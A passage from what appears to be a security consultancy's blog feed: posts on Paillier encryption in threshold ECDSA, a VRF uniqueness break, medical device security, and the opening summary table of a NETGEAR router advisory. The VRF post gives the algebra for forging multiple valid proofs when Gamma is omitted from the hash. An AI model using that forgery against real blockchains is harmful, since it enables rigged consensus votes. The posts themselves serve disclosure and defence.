In the context of IND-CCA security, these properties would allow an attacker with access to a decryption oracle (that works on any ciphertext besides the target ciphertext) to decrypt a target ciphertext by transforming it homomorphically before querying the oracle, and undoing the transformation after. In that sense, Paillier is no different than any other homomorphic encryption scheme: no homomorphic encryption scheme can offer IND-CCA security.

Applications and Protocols using Paillier Encryption

In the 20+ years since Pascal Paillier devised this encryption scheme, it has been used in a variety of cryptographic protocols and applications. One recent popular application is multi-party ECDSA signing protocols.

ECDSA produces signatures in a group \mathbb{G} of elliptic curve points over a field of order p' with generator G of order q'. (We write p' and q' here to distinguish these primes from the factors of an RSA or Paillier modulus — they are completely different.) ECDSA private keys are elements x \in \mathbb{Z}_{q'} (scalars) and public keys are the corresponding elliptic curve points, xG. The signature on a message whose hash is h \in \mathbb{Z}_{q'} is computed as

(r, s) = (r_x \mod q', k^{-1} \cdot (h + r\cdot x) \mod q')

where (r_x, r_y) = kG for a fresh, uniformly random k \in \mathbb{Z}_{q'}.

In multi-party ECDSA signing protocols, two or more parties have shares of a private key and jointly generate signatures. These schemes typically provide security and correctness even when some small number of protocol participants misbehave. To achieve this, the use of Paillier encryption is often augmented with zero-knowledge proofs: for example, protocol participants can prove that their Paillier public keys were correctly generated, that ciphertexts encrypt values within given ranges, or that ciphertexts encrypt values corresponding to the discrete logarithm of some known public value.

Combining Paillier encryption — which works in groups modulo n or n^2, where n is usually at least 2048 bits long — and ECDSA — which works in groups whose sizes are usually 256 bits — is not trivial. To illustrate this, we’ll examine three recent multi-party ECDSA protocols.

Lindell’s Two-Party ECDSA Protocol (2017)

Lindell’s two-party ECDSA signing protocol [Lindell2017] uses Paillier encryption to compute the s component of the signature homomorphically. During key generation, the first party sends a Paillier encryption of their share x_1 of the ECDSA private key to the second party, along with zero-knowledge proofs that (i) their Paillier modulus satisfies GCD(n, \phi(n)) = 1, and (ii) the ciphertext is indeed an encryption of the discrete log of x_1 G. Then, when generating a signature, the second party can craft most of the s component of the signature by operating homomorphically on the encryption of x_1 and combining it with a ciphertext that it crafts. The second party sends back the Paillier ciphertext to the first party, who decrypts it and performs a final operation with their share of the nonce.

Since the second party crafted the ciphertext homomorphically, it cannot reduce the encrypted value modulo q' before sending it back to the first party, which may allow some information to leak. To prevent this, the second party must add a random multiple of q' when it is forming the ciphertext.

The proof that GCD(n, \phi(n)) = 1 is described in a paper by Hazay, Mikkelsen, Rabin, Toft, and Nicolosi (eprint 2011/494, Section 3.3). Interestingly, proving that the Paillier modulus satisfies GCD(n, \phi(n)) = 1 — which guarantees nothing about how many prime factors it has — is sufficient for the security of this particular ECDSA protocol: using the base g=1+n, there is still the same isomorphism between \mathbb{Z}^\star_{n^2} and \mathbb{Z}_n \times \mathbb{Z}^\star_n. The Paillier modulus must be at least {q'}^3 + {q'}^2, where q' is the size of the ECDSA group.

The Gennaro–Goldfeder Multi-Party Threshold ECDSA Protocol (2018–2021)

In Gennaro and Goldfeder’s threshold ECDSA protocol [GenGol2019], each party has their own Paillier key pair. Each Paillier modulus is accompanied by a zero-knowledge proof that it is square-free and that for any two prime factors p and q of the modulus, p does not divide q - 1. This proof was devised by Gennaro, Micciancio, and Rabin (CCS 1998, PDF, Section 3.1). The protocol also requires that each Paillier modulus is greater than {q'}^8, where q' is the size of the ECDSA group.

Each participant has an additive share of the private ECDSA key x. When the signing protocol is run, each party also randomly generates an additive share of the nonce inverse k^{-1} and an additive share of the nonce “mask” \gamma used to hide the value of k (which, if leaked, would allow recovering the ECDSA private key). As part of jointly computing the signature, parties must compute additive shares of the products k^{-1}\cdot \gamma and k^{-1}\cdot x. Paillier encryption is used in a sub-protocol for multiplicative-to-additive share conversion during the computation of additive shares of these two products.

Suppose there are t parties whose goal is to jointly compute the product a\cdot b, and each party i has additive shares a_i and b_i of a and b. The product can be written as

(\sum_{i=1}^{t} a_i) (\sum_{i=1}^{t} b_i) = \sum_{i=1}^{t} a_i\cdot b_i + \sum_{i,j : i \neq j} a_i\cdot b_j.

The share conversion protocol transforms multiplicative shares of values (the cross-terms a_i\cdot b_j) held by parties i and j to equivalent additive shares (\alpha_{i,j} and \beta_{i,j}) satisfying a_i \cdot b_j \equiv \alpha_{i,j} + \beta_{i,j} \mod q'. It works as follows. First, party i sends party j a Paillier encryption of their multiplicative share a_i (along with a zero-knowledge proof that the encrypted value is in the correct range respective to q'). Party j operates homomorphically on the ciphertext it received to compute an encryption of a_i \cdot b_j + \beta'_{i,j} for a random \beta'_{i,j} \in \mathbb{Z}_{q'^5} (and provides a zero-knowledge proof that the ciphertext was formed with values from the correct ranges). Party i then computes their additive share \alpha_{i,j} by decrypting this ciphertext and reducing it modulo q'. Party j’s additive share is \beta_{i,j} = - \beta'_{i,j} \mod q'.

Note that \beta'_{i,j} is sampled uniformly at random from \mathbb{Z}_{q'^5}, not \mathbb{Z}_{q'} (where q' is the ECDSA group size) or \mathbb{Z}_{n} (where n is the Paillier modulus). This modulus was chosen so that the range of possible values is big enough that the distribution of a_i \cdot b_j - \beta'_{i,j} does not leak information about b_j \in \mathbb{Z}_{q'}, but small enough that no reduction modulo the Paillier modulus n occurs when homomorphically computing the ciphertext of a_i \cdot b_j - \beta'_{i,j}.

Finally, after repeating this sub-protocol for all cross-terms in the product of a\cdot b, each party i can compute their additive share of the product as a_i\cdot b_i + \sum_{j : j \neq i} \alpha_{i,j} + \beta_{j,i}. This is how additive shares of the products k^{-1}\cdot \gamma and k^{-1}\cdot x are computed.

The Canetti–Gennaro–Goldfeder–Makriyannis–Peled Threshold ECDSA Protocol (2020–2021)

In Canetti, Gennaro, Goldfeder, Makriyannis, and Peled’s threshold ECDSA scheme [CanGenGolMakPel2021], each party has their own Paillier key pair that is accompanied by a proof that the modulus is a Paillier-Blum modulus (that it is a product of two primes congruent to 3 modulo 4 and that it satisfies GCD(n, \phi(n)) = 1) and that it has no small factors.

Paillier encryption has several uses in this scheme.

  • First, it is used in a multiplicative-to-additive share conversion protocol like the ones in Gennaro and Goldfeder’s 2018 protocol, described earlier, to compute additive shares of k^{-1}\cdot \gamma and k^{-1}\cdot x during signing. The zero-knowledge proof accompanying the first party’s (party i’s) message is like the one described earlier: it proves that the encrypted value is in the correct range with respect to q'. The proof accompanying party j’s message is slightly different than in Gennaro and Goldfeder’s multiplicative-to-additive share conversion scheme. Recall that party j operates homomorphically on the ciphertext it received from party i by multiplying it with b_j and adding -\beta'_{i,j} to it using party i’s Paillier key. Here, party j provides a zero-knowledge proof that the ciphertext it sends back to party i was formed with values from the correct ranges, and that (i) the multiplicative coefficient equals the discrete log of a certain known value, and (ii) the additive term equals the same value encrypted in a Paillier ciphertext using party j’s own key.
  • Paillier encryption is also used in a key refresh procedure, where each party chooses a random secret sharing of 0 (modulo the ECDSA group order q') and encrypts one share to each other party’s Paillier key. The parties then use the received shares to update their secret key shares without changing their shared public key.
  • Finally, the Paillier modulus is re-used as the modulus of ring Pedersen (Fujisaki–Okamoto) commitments (eprint 2001/064, PDF), whose security relies on the strong RSA problem. Each party has a pair of ring Pedersen parameters (s,t) \in \mathbb{Z}^\star_{n} \times \mathbb{Z}^\star_{n} (where n is their Paillier modulus), for which they provide a zero-knowledge proof that s belongs to the multiplicative group generated by t modulo n. Ring Pedersen commitments are used in zero-knowledge proofs with the verifier’s Paillier modulus.

The paper includes the interesting observation that Paillier encryption can be used as a commitment scheme to simplify some zero-knowledge proofs. When a participant encrypts a plaintext with their own Paillier key, it produces a cryptographic commitment to that plaintext that is perfectly binding (due to the bijection between \mathbb{Z}^\star_{n^2} and \mathbb{Z}_n \times \mathbb{Z}^\star_{n}) and computationally hiding (due to Paillier’s IND-CPA security, assuming computing nth residue classes is hard).

Interestingly, this paper defines Paillier decryption with \phi(n) instead of \lambda(n) for the base 1+n. Since \lambda(n) \mid \phi(n), the decryption equation is still correct with c_{dividend} = ((c^{\phi(n)} \mod n^2) - 1)/n and c_{divisor} = (((1+n)^{\phi(n)} \mod n^2) - 1)/n = \phi(n).

Implementation Considerations

Key Generation

Paillier key generation has many of the same potential pitfalls as RSA key generation, as well as some other potential issues related to the choice of base.

  • First, the public key should be big enough that factoring it with modern, general-purpose algorithms, like the General Number Field Sieve (GNFS), is infeasible. For factoring the modulus with the GNFS to be roughly at least as hard as brute-forcing a 128-bit symmetric key, the modulus size should be at least 3072 bits, so the two prime factors p and q should be at least 1536 bits each.
  • It is crucial to use a good source of randomness when selecting primes p and q, and to choose them independently so that no special-purpose factoring algorithms apply. For example, if the primes are too close together, the modulus can be factored efficiently with Fermat’s factorization method.
  • The modulus must satisfy GCD(n, \phi(n)) = 1. An easy way to enforce this property is to choose the two primes p and q having exactly the same bitlength. If GCD(n, \phi(n)) > 1, then either p divides q-1 or q divides p-1. And since \lambda(n) = LCM(p-1,q-1), it will not be co-prime to n either. This destroys the bijection between the groups \mathbb{Z}^\star_{n^2} and \mathbb{Z}_n \times \mathbb{Z}^\star_{n} (for any base, even one with the correct order), and decryption no longer works. As a quick example, consider p=5 and q=11, so n=5\cdot 11=55 is not co-prime with \phi(n)=4\cdot 10=40. First, raising an element y \in \mathbb{Z}^\star_n to the power of n, as is done to randomize ciphertexts during encryption, is a many-to-one function, which is enough to break the bijection. For example, 1332 \equiv 3^n \equiv 23^n \equiv 38^n \equiv 48^n \equiv 53^n \mod n^2. Second, even with a proper base like g=1+n=56, which has order n=55 modulo n^2, decryption no longer works and many plaintexts can correspond to the same ciphertexts. For example, the five messages 8, 19, 30, 41, and 52 would be indistinguishable during decryption after raising the ciphertext to the power of \lambda(n): g^{8\cdot \lambda(n)} \equiv g^{19\cdot \lambda(n)} \equiv g^{30\cdot \lambda(n)} \equiv g^{41\cdot \lambda(n)} \equiv g^{52\cdot \lambda(n)} \equiv 2751 \mod n^2.
  • The order of the base g modulo n^2 must be a non-zero multiple of n.
    Otherwise, there is no longer a bijection between the groups \mathbb{Z}^\star_{n^2} and \mathbb{Z}_n \times \mathbb{Z}^\star_{n}. As a quick example, consider p=11, q=13, n=143, and the base g=146, which has order 165=3\cdot 5\cdot 11 modulo n^2 (which is not a multiple of 143). Then, encryption is a 13-to-1 mapping and every w \in \mathbb{Z}^\star_{n^2} has 13 possible corresponding messages. For example, the ciphertext 775 could be obtained by encrypting any one of \{5, 16, 27, 38, 49, 60, 71, 82, 93, 104, 115, 126, 137\}: 146^5\cdot 58^n \equiv 146^{16}\cdot 15^n \equiv 146^{27}\cdot 31^n \equiv \cdots \equiv 146^{137}\cdot 97^n \equiv 775 \mod 143^2.

Encryption

Paillier encryption is randomized and the random values y \in \mathbb{Z}^\star_{n} must be carefully generated and handled.

  • It is important to use a good source of randomness when choosing y \in \mathbb{Z}^\star_{n}, and to generate a fresh, independently chosen value of y every time a message is encrypted. Known relations between the y values of multiple ciphertexts can be exploited to learn information about their corresponding plaintexts. For example, suppose two ciphertexts c_1 and c_2 (encrypting x_1 and x_2) are known to have been generated with the base g = 1+n using random values that are inverses of each other modulo n: y \in \mathbb{Z}^\star_n and y^{-1} \in \mathbb{Z}^\star_n. Then, due to the additively homomorphic properties of Paillier ciphertexts and the cancellation of the random values, the sum of the plaintexts (modulo n) can be recovered by computing ((c_1\cdot c_2 \mod n^2) - 1) / n.
  • Since encryption includes modular exponentiation to a secret value (x), a constant-time implementation — one without any data-dependent operations — must be used to avoid leaking information about the plaintext.
  • The random element y also must be kept secret and handled in constant-time.
    If the value y corresponding to a particular ciphertext c = (1+n)^x\cdot y^n \mod n^2 is ever leaked, the plaintext can be recovered by computing (y^n)^{-1} \mod n^2 (e.g., using the Extended Euclidean Algorithm), then computing ((c\cdot (y^n)^{-1} \mod n^2) - 1) / n.

Decryption

Paillier decryption involves the secret key, \lambda(n), and the usual recommendations apply.

  • Since decryption includes modular exponentiation to the secret value \lambda(n), a constant-time implementation — one without any data-dependent operations — must be used to avoid leaking information about the key.
  • If the value of c_{divisor} = ((g^{\lambda(n)} \mod n^2) - 1)/n is pre-computed, it must be afforded the same protections as the secret key, \lambda(n).

Homomorphic Operations

Paillier homomorphic operations are a feature, not a bug! Still, some care must be taken.

  • It is important to remember that ciphertexts are malleable by design, and provide no message authentication — they can easily be tampered with.
  • Homomorphic operations apply modulo n: when homomorphically adding two plaintexts or homomorphically multiplying a plaintext by some constant c, the result will be their sum or product modulo n.
  • Certain edge cases of homomorphic operations require explicit re-randomization to retain ciphertext indistinguishability.
    To homomorphically multiply a ciphertext by 0 or 1, the ciphertext is raised to the power of 0 or 1 respectively, which either results in 1 or no change at all to the ciphertext. In these two cases, the ciphertext should be re-randomized by choosing a fresh random value y \in \mathbb{Z}^\star_n and multiplying the ciphertext by y^n modulo n^2.

Conclusion

The Paillier cryptosystem is based on a fascinating number theoretic problem. Its homomorphic properties make it especially useful in multi-party computation protocols, such as many recent threshold ECDSA protocols. Since the security of Paillier is related to factoring, Paillier moduli must always be large enough that factoring them is infeasible. Protocols involving Paillier encryption and groups of different sizes must carefully account for the different sizes.

Finally, if being familiar with RSA and Paillier has made you want to learn more, consider reading about the Damgård–Jurik cryptosystem (b. 2001) in “A Generalisation, a Simplification and Some Applications of Paillier’s Probabilistic Public-Key System” (PKC 2001, PDF).

References

[Paillier1999]: “Public-Key Cryptosystems Based on Composite Degree Residuosity Classes” by Pascal Paillier, EUROCRYPT ’99. Available at https://link.springer.com/chapter/10.1007/3-540-48910-X_16.

[Lindell2017]: “Fast Secure Two-Party ECDSA Signing” by Yehuda Lindell, CRYPTO 2017. Available at https://link.springer.com/chapter/10.1007/978-3-319-63715-0_21 and https://eprint.iacr.org/2017/552.

[GenGol2019]: “Fast Multiparty Threshold ECDSA with Fast Trustless Setup” by Rosario Gennaro and Steven Goldfeder. Available at https://eprint.iacr.org/2019/114.

[CanGenGolMakPel2021]: “UC Non-Interactive, Proactive, Threshold ECDSA with Identifiable Aborts” by Ran Canetti, Rosario Gennaro, Steven Goldfeder, Nikolaos Makriyannis, and Udi Peled. Available at https://eprint.iacr.org/2021/060.

Acknowledgements

Thank you to Paul Bottinelli, Giacomo Pope, and Eric Schorn of Cryptography Services and Paul Grubbs for comments on an earlier version of this blog post.

Rigging the Vote: Uniqueness in Verifiable Random Functions

18 May 2023 at 11:00

This blog post presents a whirlwind overview of Verifiable Random Functions (VRFs) as used by several leading-edge blockchains, and shows how a very interesting and recently found implementation oversight causes the VRF’s assurance of uniqueness to fall apart. As VRFs are commonly used for selecting blockchain consensus voting committees, this can result in a rigged vote on the progression of consensus.

Blockchains can be considered to be distributed consensus systems that have historically used compute-intensive Proof of Work (PoW) techniques to control forward progress. As PoW can be extremely energy intensive, more advanced techniques known as Proof of Stake (PoS) have emerged that use a voting committee to control forward progress. Each node can independently self-determine whether they are a member of an upcoming voting committee through the results of a VRF, where the input originates from the current consensus state and the node’s secret key, the unique and deterministic output (alongside a node’s stake) determines the membership result, and the whole process can be subsequently verified by any/all interested third parties. If a set of nodes can maliciously join the voting committee by manipulating the VRF results, they can then vote for the wrong next consensus state.

While Verifiable Random Functions can be traced back to 1999, the subject gained new momentum in March 2017 with the release of the Internet Research Task Force (IRTF) Crypto Forum Research Group (CFRG) document draft-irtf-cfrg-vrf-00 which is now up to version 15. That document defines a VRF to be “…the public-key version of a keyed cryptographic hash. Only the holder of the secret key can compute the hash, but anyone with the public key can verify the correctness of the hash”. Simplistically, the VRF functionality consists of 3 API functions using elliptic curve techniques (hence ECVRF) that provide an assurance of uniqueness central to the discussion below. Additional background on VRFs and their multiple assurances can be found in the two prior posts noted below that were written back when the IRTF CFRG VRF document was at version 5.

  1. Reviewing Verifiable Random Functions
  2. Exploring Verifiable Random Functions in Code

VRF Specification Section 5.1 ECVRF Prove

This first API function utilizes an input called the alpha_string which originates with the current consensus state (e.g., perhaps the last agreed block hash) along with a secret key SK (synonymous with x below). The alpha_string is public and common to all nodes, while the secret key is fixed and specific to a particular node. The output is a VRF proof which can be loosely thought of as a seed Gamma alongside its signature/witness c and s. The steps below are simplified for clarity, where B is a generator and q is the curve order.

ECVRF Prove() Steps:

1. Use the SK as x to calculate the public key Y = x*B
2. Encode the alpha_string to an elliptic curve point H
3. Calculate Gamma = x*H
4. Generate a deterministic nonce k
5. Calculate c = Hash(Y, H, Gamma, k*B, k*H)
6. Calculate s = (k + c*x) mod q
7. Return the proof as {Gamma, c, s}

Spoiler: the implementation oversight involves a missing Gamma from the hash inputs on step 5. A node holds the calculated proof c and s elements in reserve and optionally discloses them much later during the verification step. Meanwhile, the Gamma value is used in the next function to generate the actual ‘randomness’.

VRF Specification Section 5.2 ECVRF Proof to Hash

This second API function utilizes the input Gamma as calculated in the above Prove() function and returns the final ‘randomness’ called beta_string. This output directly depends upon the hash of Gamma, while the previously calculated c and s values are not used here. The cofactor is just a curve-specific constant.

ECVRF Proof_to_Hash() Steps:

1. Given a valid decoding of {Gamma, c, s}
2. beta_string = Hash(domain_separators || cofactor * Gamma || domain_separator)
3. Return the beta_string

The calculated beta_string is the critical value used by a blockchain to allow nodes to self-determine if they are on an upcoming voting committee. The beta_string would be inspected for particular characteristics, such as its magnitude relative to a node’s stake. As each node has a different secret key SK, each node will calculate a different beta_string result. As the process from alpha_string and SK to beta_string is deterministic, there should only be one possible result. The concept of selecting a voting committee through VRF results would be broken if a node could simply rerun the process until a desired result were obtained.

Note that the nonce k does not directly participate in the calculation of the beta_string. If an adversary chose to play games with the k value, it would not result in a different beta_string (which is the only value assured of uniqueness).

VRF Specification Section 5.3 ECVRF Verify

This third API function utilizes the Gamma, c and s values calculated by the Prove() function, along with the original alpha_string, to verify that a particular beta_string was indeed generated legitimately. The beta_string could be considered a commitment with the Verify() performing a sort of signature verification.

ECVRF Verify() Steps:

1. Given a valid decoding of {Gamma, c, s}, public key Y, and alpha_string
2. Encode the alpha_string to an elliptic curve point H
3. Calculate U = s*B - c*Y
4. Calculate V = s*H - c*Gamma
5. Calculate c' = Hash(Y, H, Gamma, U, V)
6. If c and c' are equal, the proof is "VALID" otherwise it is "INVALID"

Note that the nonce k value is never seen by itself. It is ‘hidden’ in the scalars used to multiply elliptic curve points. Thus, a wrongly chosen k cannot be detected and this in fact becomes central to the break.

Nodes can demonstrate legitimate membership on the voting committee by disclosing their proof {Gamma, c, s} for anyone to verify, assuming the characteristics of the beta_string are acceptable.

Uniqueness

If the above functionality is implemented correctly, the VRF output beta_string is assured to be unique. The IRTF CFRG VRF specification defines Full Uniqueness in section 3.1 as follows:

Uniqueness means that, for any fixed VRF public key and for any input alpha, it is infeasible to find proofs for more than one VRF output beta.

In the context of blockchains, this can be visualized as: given a current state alpha_string and a single secret/public key pair, a node can only generate a single output beta_string that passes verification. Thus, ‘the dice that determine a node’s voting committee membership for the current state can only be rolled once’.

Breaking Uniqueness

As mentioned in the spoiler above, a hash function that misses Gamma in both Prove() step 5 and Verify() step 5 will seem to work fine in practice but its uniqueness can be broken with some effort. Specifically, for a given alpha_string and secret key, a malicious prover can generate arbitrary proofs that will correctly verify under their public key. Let us choose k and calculate a proof of the following form using exponential notation (where cInv is c-1). Note that the hash does not contain Gamma, which is the source of the ‘opportunity’ as the oversight allows c to be calculated fully independently of Gamma.

{Gamma = H(sk + cInv), c = Hash( Y || H || B(k + 1) || Hk ), s = k + (sk + cInv) * c}

If multiple proofs of this form were generated by multiple choices of k, then we have multiple Gamma values that would then result in different non-unique beta_strings. But would they verify?

Given an instance of the above proof, the Verify() steps will calculate the following two values.

U = Bs – Yc = B(k + (sk + cInv)c) – Bsk*c = B(k + sk*c + 1 – sk*c) = B(k + 1)
V = Hs – Gammac = H(k + (sk + cInv)
c) – H(sk + cInv)*c = H(k + sk*c + 1 – sk*c – 1) = Hk

This will result in the following c’ which will indeed validate.

c’ = Hash( Y || H || B(k + 1) || Hk)

As a result, a set of nodes can rerun Prove() with different choices of k until the obtain a beta_string that gains membership on the voting committee. At that point, the fake electors can vote for world peace.

The author would like to thank Parnian Alimi, Giacomo Pope, Kevin Henry, Eli Sohl, Aleksandar Kircanski and Paul Bottinelli of NCC Group’s Cryptography Services team for their review of this post. All issues remain with the author.

Medical Devices: A Hardware Security Perspective

17 May 2023 at 17:48

Medical device security is gaining more attention for several reasons. The conversation often gets connected to device safety, that is, the degree to which the risk of patient harm is limited by preventing or controlling for device malfunction. Device security expands the scope of safety by supposing a malicious attacker is causing or exploiting the device to malfunction. If it’s not secure, it’s not safe.

The threat model for medical devices has changed over time. Previously, a lack of connectivity, the inherent physical controls in a medical facility or within one’s home, and the generally high cost and low availability of these niche devices for research all limit the exploitability of any lingering vulnerabilities.

However, the advancement of connected health highlights the importance and subtle distinctions associated with securing the ever-growing set of medical devices. At NCC Group, we have previously written about the importance of securing any connected device. In this blog post, we specifically focus on medical devices from a hardware security researcher’s perspective. We go on to discuss how the regulatory landscape attempts to align with this view.

A Unique and Varied Threat Model

While the threats and corresponding mitigations that apply to a medical device may resemble that of any typical hardware threat model, at a minimum, the severity associated with a typical vulnerability class is likely to differ, potentially significantly. A remote code execution exploit is just as likely to be critical for a medical device as it would be with any other IoT product, but the impact of lesser vulnerabilities may be increased as well. Furthermore, because of the specialized problems that healthcare devices are designed to address, correspondingly unique threats may become apparent. A traditional goal of an adversary may be complete device compromise, running arbitrary and potentially malicious software on the device, but note the stakes are often higher in the case of medical devices. Gaining control of some sensor or actuator may have serious impacts, but that impact is more perilous when the device is interfacing with a human body.

In some contexts, a user’s personal data can be valuable to an adversary, but patient healthcare data is inherently more so. User data leakage is historically treated according to the value of the data and breadth of the incident – credit card numbers and passwords are serious, and usernames are typically less so depending on the circumstances. Leaking so much as a patient’s name carries more weight when it effectively maps that individual to a medical condition or some immutable attribute of theirs. Patient data is tightly coupled with the core functionality of many medical devices. The attack surface may be significantly greater as a result if operation of the system requires this data to be more exposed, whether it must be stored persistently, communicated between multiple processes over some IPC channel, or transmitted to a remote back end. Certain aspects of user privacy are too often an afterthought in the consumer technology space, but medical information is one asset where users/patients expect a much greater degree of scrutiny and protection. To that effect, user privacy is often treated as a separate entity or extension of device security. Data can include health conditions, family history, routines and activities, genetic information, and perhaps soon, even one’s own thoughts. Such a privacy breach is therefore justifiably covered by longstanding laws in the US and EU, presenting more serious consequences to the manufacturer as a result.

For another example, consider a denial-of-service vulnerability. The severity of these weaknesses is often deemed less significant, and the risk of exploitation is acceptable for many products. This evaluation changes dramatically for a battery-powered medical implant. For example, a denial-of-service could result in serious harm to the patient due to missed treatment. Furthermore, even if patient harm is not an immediate concern, additional surgery to replace an unrecoverable implant may be necessary, which is much more significant than replacing some unusable office equipment.

The above examples highlight some of the unique threats inherent with many medical devices. Several other fairly common factors skew the threat landscape further.

Attack Surface

Not long ago and still reasonably common today, a typical medical device design pattern may involve recording patient data or administering some therapy, and then connecting physically to an offline host machine in a physically secure clinic for medical staff to interact with the device thereafter. A predictable evolution of such a device would be to add wireless connectivity, thus supporting interaction at an arbitrary location – common implementations include the use of an Internet connection and a mobile or web application. With that functionality comes additional attack surface not previously considered in the prior generation. Note a unique aspect in this circumstance: Such a device is likely to need to connect to a hospital/clinic network potentially exposing it to everything else on that network and vice versa. That same device may split time on patients’ home networks as well, further exposing it to a variety of network-based threats.

As with other heavily regulated industries, the mere concept of updateable software and firmware is somewhat novel in the medical device space. It is relatively straightforward to develop firmware for a device that is effectively immutable, test it extensively, and then expect to only update it in the event of a recall, perhaps involving a specialized technician performing that update on-site or swapping out the entire device. This model falls short knowing that new vulnerabilities, including those found in third-party software, are discovered with increasing frequency, a fact exacerbated by the growing complexity of these devices. As such, the capability for over-the-air updates is now widely expected for any device with a network connection. Naturally, this feature happens to be a prime attack vector if it is poorly designed or implemented.

Users and Permissions

Multiple types of users may interact with these devices, namely: patients, caregivers, medical staff, hospital IT administrators, not to mention OEM administrators or service technicians as well. This is quite distinct from, say, a smartphone that is almost exclusively accessed by its user/owner for its entire lifetime. The authorization of these roles to specific application and device capabilities can quickly become complex and an easy target for privilege escalation. Over their lifetime, some devices may be used by multiple patients, presenting further possibility of patient data exposure even after treatment is concluded. This is akin to second-hand device and rental car scenarios, highlighting the importance of a factory reset function that securely erases all patient data and reliably returns the device to a known good state. For a medical device, flash memory that is not securely erased may be re-deployed to a new patient while still containing the old home Wi-Fi password, credit card number, or private medical information of the previous patient. Obsolete equipment sold as surplus may still contain the means to access mission-critical hospital infrastructure.

Longevity and Maintenance

Speaking of product lifetime, medical devices are often expected to be supported longer than the oft-seen three-to-five-year window for many consumer IoT products. Managing software updates for that duration is challenging, requiring careful management of vendor relationships, third-party patches and firmware deployment, all in a timely manner. Some third-party software components may fall out of support and significant changes to software dependencies may qualify as significant enough design changes to trigger regulatory re-approval. This all presents an environment where stale software is more likely to exist on the product as it ages. While known critical vulnerabilities may be addressed appropriately, those that are low severity or in deeply embedded dependencies may be overlooked. Regulators require a defined software bill of materials (SBOM) for medical devices, expecting OEMs to demonstrate that they are at least aware of everything included in their device, but maintaining (and patching!) all of that software is just as important and potentially more challenging for the pieces out of their direct control.

Complexity and Novelty

Another aspect of complexity applies to the device design itself. While not an absolute, consumer IoT devices and commoditized products are less likely to deviate much from a vendor reference design, perhaps using a known SoC and baseband combination with established security configuration features and relatively little custom hardware, along with a vetted Board Support Package (BSP) including an OS, drivers, bootloader, and libraries that implement the core security features of the product. Many medical devices are attempting to solve niche problems with significant constraints using creative solutions, and this may require custom board or FPGA design, a novel algorithm that accepts external inputs, or some unique communication interface to get data from the patient’s body to an appropriate destination, all of which have been subject to less scrutiny than required.

Finally, there exists an economic/business factor that may be of interest to a security researcher. The medical device environment is, in many cases, one of pure research and engineering. In cases where a device originates in an academic or startup environment, costs will be constrained, and security is more likely to be deprioritized in favor of development of the novel medical aspects of the technology. Instead of some incremental improvement on a common device, these are often first-generation devices with yet-to-be-seen behaviours and potential misbehaviours.

Classification

There exists several proposed and conventional criteria to classify medical devices for regulatory purposes or otherwise depending on the context. Patient safety, the existence of a similar design (i.e., the novelty of the function), the range of the connectivity interfaces used, the physical environment (hospital, home, public), and ownership of the device all serve to classify device types. A networked MRI machine is markedly different from a portable EKG in many ways.

Interestingly, these classifications also serve as guidance for a security researcher, providing an additional rough measure of the threats associated with the device. Higher potential for patient harm (e.g., a class III or IV device) significantly escalates impact of even the most limited vulnerabilities like the ability to degrade battery life.

More user roles may also suggest a greater likelihood of privilege escalation or authorization bypass. Here, an example problem may be a vulnerability that unlocks device calibration capabilities that would otherwise be accessible only to a service technician.

A device’s connectivity, say whether it connects via BLE to a mobile application or relies on a hardwired ethernet connection for all interactions, has a clear mapping to attack surface. Devices that stay in a clinic or are attached to a patient in their daily life helps establish the likelihood of physical threats to the device. Finally, novel products are potentially more likely to have custom, under-scrutinized software or a class of vulnerability that may not have been considered.

Regulation Landscape

The FDA, EU, and other global medical device regulators are beginning to acknowledge this complexity. Of course, there was a time when these regulatory bodies did not have to concern themselves with medical devices as we know them today, much less internet-connected ones that may be reprogrammed to operate in an unintended manner. While we have discussed the set of common traits that tend to distinguish medical devices from other hardware in general, there remains a challenge in effectively evaluating these devices to be safe for use and therefore secure from attack given the variety of threats that they face.

Regulators have traditionally relied on post-market response to address most cybersecurity concerns – patching or recalling products as necessary. Recognizing that this can be expensive, skews incentives, and may be insufficient to address all security concerns, premarket guidance and requirements have more recently been a focus of regulation in the industry. Compliance of this nature presents a difficult trade-off of applying a general process to a diverse set of products and have it be effective enough. Usually this leads to a low bar to meet – a checklist step in QA just prior to product release. Of course, this is neither appropriate nor desirable in a market where the impact to the users/patients can be so significant.

A naive approach to objectively measuring device security is to focus on the final product – beginning with a set of requirements that can be applied to a broad set of devices based on a general threat model or profile developed by a standards body. This attempts to provide some fundamental measure of the security of the product and its users based on whether those requirements are met or not. The benefit to such a method is it avoids encumbering the OEM, keeping “security” and “certification” to a relatively known cost and effort to fit nicely in the development schedule running alongside QA.

Medical device regulation, such as that established in the FDA’s guidance for medical device security, predominantly takes a more comprehensive “show your work” approach like that of other burgeoning programs related to hardware security. This guidance defines a Secure Product Development Framework (SPDF), which includes many intersection points with the product development lifecycle – an initial risk assessment, ample architecture documentation, product security requirements, threat modeling, and informed testing. These can take months of effort instead of weeks to do properly, but more effectively account for the unique threats applicable to a connected health product and the appropriate controls to address them. Recently, the FDA has stated that 510(k), pre-market authorizations, and De Novo applications for medical device approval may be refused on the grounds of insufficient evidence of the product being secure, so it is important for manufacturers to take this seriously.

In 2019, the EU provided similar guidance to serve as a precursor to more explicit regulation. The MDR states the single mandatory requirement related to device security:

For devices that incorporate software or for software that are devices in themselves, the software shall be developed and manufactured in accordance with the state of the art taking into account the principles of development life cycle, risk management, including information security, verification and validation.

The requirement itself is vague, but the accompanying guidance clearly establishes a similarly high expectation regarding the assessment and control for the security threats posed to any prospective device.

Conclusion

Now, more than ever, medical devices present an interesting landscape of potential targets for security research. They are becoming more connected (and so more exposed to attack) and more capable of accomplishing amazing and life-changing healthcare outcomes for their users (and so more impactful if they are made to do otherwise). While these medical products often employ the same underlying technologies and hardware security principles as other IoT products the set of threats associated to the devices, their users, and their OEMs are often unique or significantly different. Regulators recognize this fast-changing environment and the need for intelligent, holistic, and qualitative secure development methodologies applied throughout the product lifecycle.

NETGEAR Routers: A Playground for Hackers?

15 May 2023 at 09:13

Summary

The following vulnerabilities were identified on the NETGEAR Nighthawk WiFi 6 Router (RAX30 AX2400) and may exist on other NETGEAR router models. All vulnerabilities discussed are patched in firmware version 1.0.10.94.

Service Vulnerability NETGEAR PSV Patched Firmware
Telnet Telnet Privilege Escalation Breakout PSV-2023-0008 v1.0.10.94
Web Application JSON Response Stack Data Leak Unknown v1.0.9.92
SOAP Service Write HTTP Response Stack Pointer Leak PSV-2023-0009 v1.0.10.94
SOAP Service SOAPAction Stack Buffer Overflow Unknown v1.0.9.92
SOAP Service HTTP Body NULL Terminator Stack Canary Corruption (DoS) PSV-2023-0010 v1.0.10.94
